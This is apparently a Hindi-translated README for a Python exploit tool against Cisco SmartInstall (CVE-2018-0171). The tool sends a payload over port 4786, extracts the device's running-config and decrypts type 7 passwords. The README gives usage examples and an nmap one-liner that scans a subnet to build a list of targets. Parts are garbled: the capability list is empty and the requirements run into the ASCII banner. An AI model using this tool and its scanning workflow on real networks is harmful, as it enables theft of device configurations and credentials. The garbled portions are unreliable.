
सिस्को SmartInstall एक्सप्लॉइट [CVE-2018-0171]
Cisco SmartInstall Exploit CVE-2018-0171
C. Papathanasiou PoC से प्रेरित
यह Python 3 स्क्रिप्ट SmartInstall चला रहे Cisco डिवाइस पर पोर्ट 4786 का उपयोग करके CVE-2018-0171 का शोषण करती है। इस शोषण के उपयोग से, एक हमलावर एक पेलोड तैयार कर सकता है, इसे Cisco डिवाइस पर भेज सकता है, और फिर running-config फ़ाइल की सामग्री निकाल सकता है।
Cisco Smart Exploit स्क्रिप्ट यह कर सकती है:

स्क्रिप्ट का उपयोग करने के लिए आवश्यकताओं की सूची यहाँ दी गई है:
tftpy==0.8.2c7decrypt secret 7 डिक्रिप्शन के लिए
gem install c7decrypt __ __ __ __ __ __ ___ ___ __ __ ___
/ ` | /__` / ` / \ /__` |\/| /\ |__) | |__ \_/ |__) | / \ | |
\__, | .__/ \__, \__/ .__/ | | /~~\ | \ | |___ / \ | |___ \__/ | |
by @AlrikRr
usage: cisco-se.py [-h] (-i IP | -f FILE | -c CONFIG)
optional arguments:
-h, --help show this help message and exit
-i IP Single IP Address
-f FILE File that contains IP list
-c CONFIG running-config File standalone
उदाहरण :
python3 cisco-se.py -i 192.168.10.1
python3 cisco-se.py -f ip_list.txt
python3 cisco-se.py -c running-config.txt
-f FILE विकल्प के लिए, nmap का उपयोग करते हुए एक उदाहरण:
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/Up$/{print $2}' > ip_list.txt
client.download() के दौरान कुछ IP के लिए टाइमआउट त्रुटि को संभालें